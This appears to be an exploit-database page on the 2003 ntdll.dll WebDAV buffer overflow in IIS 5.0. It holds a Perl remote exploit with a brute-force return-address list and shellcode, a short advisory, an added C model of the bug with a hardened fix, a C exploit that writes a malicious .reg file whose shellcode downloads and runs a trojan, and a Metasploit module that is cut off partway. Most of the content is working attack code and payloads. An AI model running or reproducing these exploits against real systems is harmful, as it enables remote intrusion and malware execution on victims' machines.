 "%ub565%u77db",
 "%ub56e%u77e9",
 "%ub61d%u7763",
 "%ub61f%u77e9",
 "%ub62c%u7763",
 "%ub652%u77e9",
 "%ub65e%u77e9",
 "%ub66a%u77e9",
 "%ub6a4%u77db",
 "%ub6a7%u7900",
 "%ub6af%u6ed4",
 "%ub6b7%u6ed4",
 "%ub6b8%u77db",
 "%ub6d5%u7900",
 "%ub6dd%u77ad",
 "%ub6dd%u77b0",
 "%ub6ec%u77ad",
 "%ub6ec%u77b0",
 "%ub6f4%u77ad",
 "%ub6f4%u77b0",
 "%ub6f7%u7763",
 "%ub6fc%u749e",
 "%ub70e%u77ad",
 "%ub712%u749e",
 "%ub718%u749e",
 "%ub778%u77e9",
 "%ub784%u77e9",
 "%ub790%u77e9",
 "%ub79c%u77e9",
 "%ub7a8%u77e9",
 "%ub7ac%u77ad",
 "%ub7b4%u77e9",
 "%ub7c0%u77e9",
 "%ub7cc%u77e9",
 "%ub7d8%u77e9",
 "%ub803%u775b",
 "%ub819%u77ad",
 "%ub992%u7763",
 "%ub9aa%u7832",
 "%ub9ce%u7763",
 "%ub9d6%u7832",
 "%uba10%u7832",
 "%uba38%u7832",
 "%uba6b%u77ad",
 "%uba6b%u77b0",
 "%uba73%u77ac",
 "%uba74%u77ad",
 "%uba74%u77b0",
 "%uba7a%u77ad",
 "%uba7a%u77b0",
 "%uba7e%u77ad",
 "%uba7e%u77b0",
 "%uba8e%u7834",
 "%uba9f%u7900",
 "%ubaa8%u7834",
 "%ubaae%u6876",
 "%ubae8%u7900",
 "%ubb34%u6876",
 "%ubc0f%u77e5",
 "%ubc37%u77e5",
 "%ubcf9%u7834",
 "%ubd00%u6c0f",
 "%ubd24%u7834",
 "%ubd38%u6c0f",
 "%ubd65%u6c0f",
 "%ubdb3%u672e",
 "%ubdc8%u7740",
 "%ubde6%u77db",
 "%ube03%u672e",
 "%ube1a%u7740",
 "%ube30%u7901",
 "%ube31%u77e5",
 "%ube43%u7901",
 "%ube53%u6995",
 "%ube65%u77db",
 "%ube75%u77e5",
 "%ube87%u77db",
 "%ubebd%u77db",
 "%ubecf%u6995",
 "%ubef8%u6995",
 "%ubf37%u7834",
 "%ubf45%u7834",
 "%ubf65%u76ae",
 "%ubf83%u7900",
 "%ubf8a%u6995",
 "%ubf92%u7900",
 "%ubf9e%u7900",
 "%ubfaa%u7900",
 "%ubfba%u76ae",
 "%ubfbf%u6c7e",
 "%ubfc5%u77db",
 "%ubfd2%u7900",
 "%ubfe1%u7900",
 "%ubfed%u7900",
 "%ubff9%u7900",
 "%uc003%u76ae",
 "%uc02e%u77db",
 "%uc02f%u77db",
 "%uc036%u6995",
 "%uc03a%u77db",
 "%uc03e%u6c7e",
 "%uc03f%u6995",
 "%uc054%u76ae",
 "%uc058%u6c7e",
 "%uc0d5%u76ae",
 "%uc0ee%u76ae",
 "%uc120%u76ae",
 "%uc142%u76ae",
 "%uc189%u65f1",
 "%uc1bc%u65f1",
 "%uc1ef%u65f1",
 "%uc1f3%u6b32",
 "%uc1f7%u77e2",
 "%uc21f%u6b32",
 "%uc268%u76ae",
 "%uc268%u77e2",
 "%uc277%u76ae",
 "%uc27f%u7834",
 "%uc286%u76ae",
 "%uc291%u77e2",
 "%uc295%u76ae",
 "%uc2a8%u76ae",
 "%uc2d1%u76ae",
 "%uc2e0%u76ae",
 "%uc2ef%u76ae",
 "%uc2fe%u76ae",
 "%uc306%u7834",
 "%uc30d%u76ae",
 "%uc32a%u7834",
 "%uc344%u7834",
 "%uc35e%u7834",
 "%uc39d%u6ed4",
 "%uc3de%u6ed4",
 "%uc3df%u6df1",
 "%uc3df%u778b",
 "%uc401%u7834",
 "%uc445%u7834",
 "%uc449%u6df1",
 "%uc449%u778b",
 "%uc459%u7834",
 "%uc4f0%u7834",
 "%uc504%u77dc",
 "%uc56b%u7834",
 "%uc578%u77e9",
 "%uc57a%u6c0f",
 "%uc583%u76ae",
 "%uc597%u76ae",
 "%uc5d6%u77ac",
 "%uc5d7%u77ac",
 "%uc5e1%u77ac",
 "%uc5eb%u77ac",
 "%uc663%u76ae",
 "%uc676%u6e44",
 "%uc676%u6e5e",
 "%uc677%u76ae",
 "%uc6f3%u6c42",
 "%uc748%u76ae",
 "%uc776%u76ae",
 "%uc7a0%u77e2",
 "%uc7da%u6b32",
 "%uc7e1%u6b32",
 "%uc7e5%u77e2",
 "%uc860%u72c2",
 "%uc860%u775b",
 "%uc86d%u72c2",
 "%uc86d%u775b",
 "%uc87d%u72c2",
 "%uc87d%u775b",
 "%uc88d%u72c2",
 "%uc88d%u775b",
 "%uc89d%u72c2",
 "%uc89d%u775b",
 "%uc8ad%u72c2",
 "%uc8ad%u775b",
 "%uc8ba%u72c2",
 "%uc8ba%u775b",
 "%uc8c7%u72c2",
 "%uc8c7%u775b",
 "%uc8d4%u72c2",
 "%uc8d4%u775b",
 "%uc8e0%u77ac",
 "%uc8fc%u77db",
 "%uc936%u77db",
 "%uc9d3%u77ac",
 "%uc9f5%u6c0f",
 "%uca02%u77ac",
 "%uca25%u77ac",
 "%uca2e%u6c0f",
 "%uca5b%u77e9",
 "%uca84%u77e9",
 "%ucad1%u77e9",
 "%ucaf1%u77e9",
 "%ucb4f%u749e",
 "%ucb72%u76ae",
 "%ucb7a%u751a",
 "%ucb7b%u76ae",
 "%ucb7e%u7763",
 "%ucb85%u7763",
 "%ucb8f%u751a",
 "%ucb98%u749e",
 "%ucba4%u751a",
 "%ucbae%u749f",
 "%ucbd0%u77db",
 "%ucc05%u749f",
 "%ucc53%u76ae",
 "%ucc81%u6df5",
 "%ucc89%u6df5",
 "%ucc8a%u76ae",
 "%uccb5%u7901",
 "%uccc7%u760d",
 "%uccd6%u741b",
 "%uccda%u760d",
 "%ucd00%u741b",
 "%ucd0f%u7901",
 "%ucd2a%u741b",
 "%ucd31%u7901",
 "%ucd3c%u7518",
 "%ucd3c%u7901",
 "%ucdb0%u7761",
 "%ucdb5%u7761",
 "%ucdb8%u7761",
 "%ucdf4%u741b",
 "%ucdf9%u77e5",
 "%uce2e%u7518",
 "%uce46%u741b",
 "%uce6a%u77e5",
 "%uce74%u7518",
 "%uce93%u77e5",
 "%uce98%u7518",
 "%ucf69%u6df5",
 "%ucf71%u6df5",
 "%ucf9c%u76ae",
 "%ucfa6%u76ae",
 "%ud067%u77db",
 "%ud0a2%u77db",
 "%ud0c5%u6b32",
 "%ud109%u6b32",
 "%ud11b%u77dc",
 "%ud163%u7901",
 "%ud17c%u7900",
 "%ud181%u7900",
 "%ud1a6%u749f",
 "%ud1d2%u77ac",
 "%ud1e0%u7901",
 "%ud1ed%u77ac",
 "%ud1f7%u749f",
 "%ud1f7%u7900",
 "%ud1fc%u7900",
 "%ud206%u7763",
 "%ud21c%u7834",
 "%ud221%u7763",
 "%ud225%u7834",
 "%ud259%u6df5",
 "%ud279%u749f",
 "%ud287%u7834",
 "%ud290%u7834",
 "%ud2b6%u77e5",
 "%ud2cd%u7900",
 "%ud2d2%u7900",
 "%ud2e1%u741b",
 "%ud2f5%u741b",
 "%ud2f5%u77e5",
 "%ud309%u741b",
 "%ud31d%u741b",
 "%ud38a%u7901",
 "%ud3aa%u7763",
 "%ud3b9%u7763",
 "%ud3bf%u7901",
 "%ud3d7%u7763",
 "%ud3db%u77dc",
 "%ud4f5%u6b32",
 "%ud514%u77ac",
 "%ud51e%u77ac",
 "%ud52d%u77e5",
 "%ud539%u6b32",
 "%ud541%u6df5",
 "%ud545%u7800",
 "%ud6dc%u77d7",
 "%ud6e2%u77a5",
 "%ud700%u77e2",
 "%ud75b%u7900",
 "%ud780%u7900",
 "%ue00e%u7900",
 "%ue010%u7738",
 "%ue020%u77db",
 "%ue02b%u77ac",
 "%ue04c%u7738",
 "%ue04e%u6ed4",
 "%ue056%u6ed4",
 "%ue0ad%u779e",
 "%ue0af%u7800",
 "%uec00%u672e",
 "%uf906%u7800",
 "%uf909%u7763",
 "%uf93f%u7763",
 "%uf942%u751a",
 "%uf94b%u77e9",
 "%uf964%u77ac",
 "%uf966%u7763",
 "%uf968%u751a",
 "%uf974%u77ac",
 "%uf981%u751a",
 "%uf991%u7763",
 "%uf9a6%u7300",
 "%uf9b3%u751a",
 "%uf9c2%u7763",
 "%uf9cd%u751a",
 "%uf9e9%u7763",
 "%uf9fb%u7300"
);


foreach my $return_address (@return_addresses)
{
 ######### return address ############
 my $return_address_part="";
 $return_address_part="";
 $return_address_part.="%u3073";
 $return_address_part.="%u3075";
 $return_address_part.="%u3074";
 $return_address_part.=$return_address;
 $return_address_part.="%ucc38"x22;
 #####################################

 ############  offsets ##############
 my $offset_len=280;
 my $offset_part="X"x$offset_len;
 #####################################
 my $shellcode_len=$url_len-(length($return_address_part)/6+$offset_len);

 my $offset_of_part_shell=0;
 print "len-> $url_len=$shellcode_len:$offset_len\n";


 my $decoder_str="%uC931%u79B1%uc1fe%ucb01%uc38b%uc789%uc289%uc931%u9041%u9041%uc38b%uc801%u338b%uce8b%u308b%uc68b%uc801%u00b4%uc689%uc78b%u3089%uc931%u03b1%u9041%ucb01%u9047%uf989%ud129%uc031%ue0b0%u03b4%uc129%uc985%uca75%uc985";
 my $decoder_str_len=length($decoder_str)/6;
 my $patch_esp="\x44\x45\x76\x76";
 my $nop="%u0048%u0048";
 my $encoded_str="${nop}${patch_esp}${shellcode}";
 my $unicoded_encoded_str_len=4*5;

 my $shellcode_part="";
 $shellcode_part="";
 $shellcode_part.=$decoder_str;
 $shellcode_part.=$encoded_str;
 $shellcode_part.="A"x($shellcode_len-($decoder_str_len+length($encoded_str)-$unicoded_encoded_str_len-1));

 my $url="/${offset_part}${return_address_part}${shellcode_part}";
 for my $METHOD ("LOCK")
 {
  my $string_to_send="$METHOD $url HTTP/1.1\r\n${host_header}${destination}${lock_token}${translate_f}${depth}Content-Type: text/xml\r\nContent-Length: $length_of_body\r\n${connection_str}\r\n${body}";
  my $results="";
  $results="";
  while($results eq "")
  {
   print STDERR "Retrying Connection...\n";
   $results=sendraw2("GET / HTTP/1.0\r\n\r\n",$host,$port,15);
   if($results eq "")
   {
    sleep(1);
   }
  }
  print STDERR "Trying with [$return_address]\n";
  $results=sendraw2($string_to_send,$host,$port,15);
  if($results eq "")
  {
   print "Connection refused: Server crashed?\n";
  }else{
   print "Failed to exploit: Server not crashed\n";
  }
 }
}

# Connect to $realip:$realport, send $pstr and return whatever the server
# answers. Returns "" when the connection is refused (the caller reads that as
# "server crashed") and "0" when no socket could be created.
sub sendraw2
{
 my ($pstr,$realip,$realport,$timeout)=@_;
 my $target2=inet_aton($realip);

 # Shared with ermm(). The original declared this with "my", which shadowed the
 # global the alarm handler sets, so the flag could never be seen here.
 our $flagexit=0;
 $SIG{ALRM}=\&ermm;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return "0";
 alarm($timeout);
 if(connect(S,pack "SnA4x8",2,$realport,$target2))
 {
  alarm(0);
  my @in;
  select(S); $|=1;
  print $pstr;
  alarm($timeout);   # ermm() closes S if the read hangs, which ends the loop below
  while(<S>){
   if($flagexit == 1)
   {
    select(STDOUT);
    close (S);
    return "Timeout";
   }
   push @in, $_;
  }
  alarm(0);
  select(STDOUT);
  close(S);
  return join '',@in;
 }else{
  alarm(0);
  close(S);
  return "";
 }
}

# SIGALRM handler: flag the timeout and close the socket so the pending read returns.
sub ermm
{
 our $flagexit=1;
 close (S);
}

- Vulnerability Information (22366)

Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) (EDBID:22366)
windows remote
2003-03-31 Verified
0 ThreaT
N/A [Click to download]
source: http://www.securityfocus.com/bid/7116/info
 
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
 
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
 
** Microsoft has revised its advisory to state that this vulnerability also affects Windows NT systems. As Windows NT does not support WebDAV, exploits that use WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP also does not include WebDAV by default, but other attack vectors may be possible, especially where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, in which case WebDAV may be a possible means of exploitation.
 
** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.
 
** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.
 
** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.
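The BID text above names RtlDosPathNameToNtPathName_U and says it lacks bounds checking, but not what the missing check was. The C model below is an added example, not code from this page or from any of the exploits on it. It shows the bug class that public analyses of MS03-007 attribute to this function, stated here as an assumption about ntdll's internals rather than as its real code: the NT UNICODE_STRING holds byte lengths in 16-bit fields, so a path of 32768 or more WCHARs wraps at 64 KiB, the destination buffer is sized from the wrapped value, and the copy uses the true length. The webroot "c:\inetpub\wwwroot\" (the default IIS 5.0 document root) and the fixed-width type names are also assumptions. The vulnerable model only computes whether the copy would exceed the allocation and never performs it; the hardened function beside it refuses any path whose byte length does not fit the field, allocates from the checked value and only then copies.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Windows WCHAR is 16 bits; fixed-width types keep the arithmetic identical on any host. */
typedef uint16_t WCHAR16;
typedef uint16_t USHORT16;

/* Stand-in for the NT UNICODE_STRING (assumption: simplified). Both lengths are
 * 16-bit byte counts, so no string over 65534 bytes can be described by one. */
typedef struct {
    USHORT16 Length;         /* bytes in use, terminator excluded */
    USHORT16 MaximumLength;  /* bytes allocated */
    WCHAR16 *Buffer;
} UNICODE_STRING16;

#define UNICODE_STRING_MAX_BYTES 0xFFFEu   /* largest even value a 16-bit field holds */
#define WEBROOT "c:\\inetpub\\wwwroot\\"  /* assumption: Windows 2000 IIS default root */

/* Bug-class model. The byte length is computed into a 16-bit field and the buffer is
 * sized from that value, but the copy uses the true length. Returns 1 when the copy
 * would run past the allocation. No memory is touched: this only does the arithmetic. */
int vuln_ntpath_would_overflow(size_t nchars)
{
    size_t   real_bytes  = nchars * sizeof(WCHAR16);
    USHORT16 trunc_bytes = (USHORT16)real_bytes;           /* silent wrap at 64 KiB */
    size_t   allocated   = (size_t)trunc_bytes + sizeof(WCHAR16);
    return real_bytes + sizeof(WCHAR16) > allocated;
}

/* Length in characters of the physical path IIS builds from a request URI. */
size_t mapped_path_chars(size_t uri_chars)
{
    return strlen(WEBROOT) + uri_chars;
}

/* Hardened construction: refuse anything whose byte length cannot be represented,
 * allocate from the checked value, and only then copy. Returns 0 on success. */
int safe_ntpath_init(UNICODE_STRING16 *out, const WCHAR16 *dos_path, size_t nchars)
{
    if (nchars > SIZE_MAX / sizeof(WCHAR16)) return -1;
    size_t bytes = nchars * sizeof(WCHAR16);
    if (bytes > UNICODE_STRING_MAX_BYTES - sizeof(WCHAR16)) return -1;  /* would not fit */
    out->Buffer = malloc(bytes + sizeof(WCHAR16));
    if (!out->Buffer) return -1;
    memcpy(out->Buffer, dos_path, bytes);
    out->Buffer[nchars] = 0;
    out->Length         = (USHORT16)bytes;
    out->MaximumLength  = (USHORT16)(bytes + sizeof(WCHAR16));
    return 0;
}

void safe_ntpath_free(UNICODE_STRING16 *s)
{
    free(s->Buffer);
    s->Buffer = NULL;
    s->Length = s->MaximumLength = 0;
}

/* Builds a path of nchars 'A' characters (constructed test input), runs it through the
 * hardened initialiser and returns the resulting Length, or -1 if it was refused. */
long try_path_of_length(size_t nchars)
{
    WCHAR16 *p = malloc(nchars * sizeof(WCHAR16));
    if (!p) return -1;
    for (size_t i = 0; i < nchars; i++) p[i] = (WCHAR16)'A';
    UNICODE_STRING16 s;
    long result = -1;
    if (safe_ntpath_init(&s, p, nchars) == 0) {
        result = s.Length;
        safe_ntpath_free(&s);
    }
    free(p);
    return result;
}

int main(void)
{
    size_t probe = mapped_path_chars(65516);   /* URI length the Metasploit module on this page sends */
    printf("mapped path of %zu chars: vulnerable copy %s\n", probe,
           vuln_ntpath_would_overflow(probe) ? "overflows its buffer" : "fits");
    printf("hardened init of the same path: %s\n",
           try_path_of_length(probe) < 0 ? "refused" : "accepted");
    return 0;
}
```

The 65516-character URI of the Metasploit module below, like the Perl exploit's URL above, becomes a 65535-character physical path once the webroot is prepended. That is past the 32767-character limit, so the vulnerable arithmetic undersizes the buffer while the hardened version refuses the path outright; a 260-character path passes both. Build with `cc -std=c99 ntpath_model.c` (file name assumed).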

/***************************************
 *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
 *@ REGEDIT Buffer Overflow Exploit ! @*
 *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
 *                                     *
 *   Discovered & coded By ThreaT.     *
 *                                     *
 *#####################################*
 *# -> ThreaT@Ifrance.com             #*
 *# -> http://www.chez.com/mvm        #*
 *# -> http://s0h.cc/~threat          #*
 *#####################################*
 * Date : 31/03/2003                   *
 ***************************************
*/

/*
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 * This exploit creates a malicious .reg file *
 * When regedit tries to write its data into  *
 * the registry, an unchecked ReadFile() into *
 * a static buffer overwrites the return      *
 * address and our arbitrary code runs: it    *
 * downloads a trojan and executes it locally *
 * without asking the user.                   *
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 -> compile : cl regexploit.c

  usage : regexploit.exe <url>

  <url> is a full link to an executable file, such as
  http://www.host.com/trojan.exe or file://c:/path/executable.exe

*/

// Tested on Win2k pro & server (fr) SP0 SP1 SP2 & SP3

#include <windows.h>
#include <stdio.h>   // printf
#include <stdlib.h>  // malloc

HANDLE RegFile;

/* Convert an ANSI string to UTF-16LE, the encoding regedit expects in a .reg file.
 * The buffer is malloc'd and never freed: this is a one-shot tool. */
char *ToWideChar(const char *cszANSIstring) 
{
	int nBufSize;
	WCHAR *wideString;

	if(cszANSIstring == NULL) return NULL; 

	// nBufSize counts WCHARs including the terminator, so size the buffer in WCHARs,
	// not bytes (the original allocated nBufSize+1 bytes and overflowed its own heap)
	nBufSize = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, NULL, 0 );
	wideString = (WCHAR *)malloc((nBufSize + 1) * sizeof(WCHAR));
	MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, wideString, nBufSize);
	return (char*)(wideString);
}

void Write (const char *str, int number)
{
	DWORD lpNumberOfBytesWritten;
	WriteFile (RegFile,str,number,&lpNumberOfBytesWritten,NULL);
}

void main (int argc, char *argv[])
{
	int i;
	char entete[] = "Windows Registry Editor Version 5.00\r\n\r\n"
			"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Discovered\\and\\coded\\by\\ThreaT]\r\n",

	*MastaBuff, *myurl,

	RealGenericShellcode[1024] =   // sized so the lstrcat() of the encoded URL below fits

	"\xAA\xC6\x02\x01" // return address

	// nop
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

	// shellcode decoder
	"\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
	"\x34\x99\xAA\x84\xC0\x75\xF8"

	// shellcode XORed with 0x99
	"\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
	"\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
	"\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
	"\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
	"\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
	"\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
	"\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
	"\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
	"\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
	"\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
	"\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
	"\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
	"\x66\x49\x71\xe6\x66\x66\x66";

	printf ("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
		"Regedit.exe Buffer Overflow Exploit\n"
		"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
		"Discovered & Coded By ThreaT.\n\n"
		"contact : ThreaT@Ifrance.com\n"
		"URL : http://www.chez.com/mvm\n\n");

	if (!argv[1])
	{
		printf ("_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n"
			"Usage   : regexploit.exe <URL://trojan.exe>\n"
			"Example : regexploit.exe file://c:/winnt/system32/cmd.exe\n"
			"_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n");
		ExitProcess (0);
	}

	/* Create the malicious .reg file */

	RegFile = CreateFile ("VulnFile.reg",GENERIC_WRITE,FILE_SHARE_WRITE,
			     NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

	if (RegFile == INVALID_HANDLE_VALUE)
	{
		printf ("Cannot create a vuln regfile !\n");
		ExitProcess (0);
	}

	Write ("\xFF\xFE",2); // UTF-16LE byte-order mark expected at the start of a .reg file
	Write (ToWideChar (entete),strlen (entete)*2); // regedit header
	
	MastaBuff = (char *) LocalAlloc (LPTR,270);		// first part of the overflowing string:
	MastaBuff[0] = '"';	memset (&MastaBuff[1],'0',260); // a quote followed by 260 '0' characters

	Write (ToWideChar (MastaBuff),strlen (MastaBuff)*2); // write the first part of the overflowing string to the file

	myurl = (char *) LocalAlloc (LPTR, strlen (argv[1])+10);
	lstrcpy (myurl,argv[1]);

	for (i=0; i < strlen (argv[1]); argv[1][i++]^=0x99); // XOR-encode the URL with the same 0x99 key as the shellcode
	lstrcat (RealGenericShellcode,argv[1]); // build the final shellcode
	lstrcat (RealGenericShellcode,"\x99");  // terminator: decodes to 0x00

	Write (RealGenericShellcode,strlen (RealGenericShellcode)); // append the shellcode to the file

	CloseHandle (RegFile);

	printf ("A malicious .reg file named VulnFile.reg has been created\n"
		"to download and execute '%s'\n",myurl);

}

/*********************

D:\code\exploits\regedit>cl regexploit.c
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.

regexploit.c
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.

/out:regexploit.exe
regexploit.obj

D:\code\exploits\regedit>regexploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Regedit.exe Buffer Overflow Exploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Discovered & Coded By ThreaT.

contact : ThreaT@Ifrance.com
URL : http://www.chez.com/mvm

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Usage   : regexploit.exe <URL://trojan.exe>
Example : regexploit.exe file://c:/winnt/system32/cmd.exe
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

D:\code\exploits\regedit>regexploit file://c:/winnt/system32/cmd.exe
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Regedit.exe Buffer Overflow Exploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Discovered & Coded By ThreaT.

contact : ThreaT@Ifrance.com
URL : http://www.chez.com/mvm

A malicious .reg file named VulnFile.reg has been created
to download and execute 'file://c:/winnt/system32/cmd.exe'

D:\code\exploits\regedit>dir VulnFile.reg
 Volume in drive D has no label.
 Volume Serial Number is 90CC-3FC3

 Directory of D:\code\exploits\regedit

31/03/2003  14:54                1 015 VulnFile.reg
               1 File(s)            1 015 bytes
               0 Dir(s)   5 602 033 664 bytes free

D:\code\exploits\regedit>VulnFile.reg

D:\code\exploits\regedit>

  Are you sure you want to add the information in d:\code\exploits\regedit\VulnFile.reg
  to the registry?

  -> YES

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

D:\code\exploits\regedit>


  this is too easy...

*********************/
		

- Vulnerability Information (22367)

Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) (EDBID:22367)
windows remote
2003-04-04 Verified
0 Morning Wood
N/A [Click to download]
source: http://www.securityfocus.com/bid/7116/info
 

http://www.exploit-db.com/sploits/22367.zip		

- Vulnerability Information (22368)

Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) (EDBID:22368)
windows remote
2003-03-17 Verified
0 aT4r@3wdesign.es
N/A [Click to download]
source: http://www.securityfocus.com/bid/7116/info
  

http://www.exploit-db.com/sploits/22368.tar.gz		

- Vulnerability Information (F83237)

Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow (PacketStormID:F83237)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,2k
CVE-2003-0109
[Click to download]

This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against any service pack.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in NTDLL.dll on Windows 2000
				through the SEARCH WebDAV method in IIS. This particular
				module only works against Windows 2000. It should have a
				reasonable chance of success against any service pack.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0109'],
					[ 'OSVDB', '4467'],
					[ 'BID', '7116'],
					[ 'MSB', 'MS03-007'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Automatic Brute Force', { } ],
				],
			'DisclosureDate' => 'May 30 2003',
			'DefaultTarget' => 0))

		register_evasion_options([
				OptBool.new('invalid_search_request', [false, 'Replace the valid XML search with random data', 'false']),

				# XXX - ugh, there has to be a better way to remove entries from an
				# enum than overwriting the evalable enum option
				OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none','hex-normal'], 'none'])
			], self.class
		)

		deregister_options('HTTP::junk_params', 'HTTP::header_folding')
	end

	def autofilter
		rport = datastore['RPORT'].to_i
		if ( rport == 139 or rport == 445 )
			rport = 80
		end
		
		true
	end
	
	def check
		url = 'x' * 65535
		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
				
		response = send_request_cgi({
			'uri'     => '/' + url,
			'ctype'   => 'text/xml',
			'method'  => 'SEARCH',
			'data'    => xml
		}, 5)
		

		if (response and response.body =~ /Server Error\(exception/)
			return Exploit::CheckCode::Vulnerable	
		end

		# Did the server stop accepting requests?
		begin
			send_request_raw({'uri' => '/'}, 5)
		rescue
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		# verify the service is running up front
		send_request_raw({'uri' => '/'}, 5)

		# The targets in the most likely order they will work
		targets =
		[
			# Almost targeted :)
			"\x4f\x4e", # =SP3
			"\x41\x42", # ~SP0  ~SP2
			"\x41\x43", # ~SP1, ~SP2

			# Generic Bruteforce
			"\x41\xc1",
			"\x41\xc3",
			"\x41\xc9",
			"\x41\xca",
			"\x41\xcb",
			"\x41\xcc",
			"\x41\xcd",
			"\x41\xce",
			"\x41\xcf",
			"\x41\xd0",
		]

		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
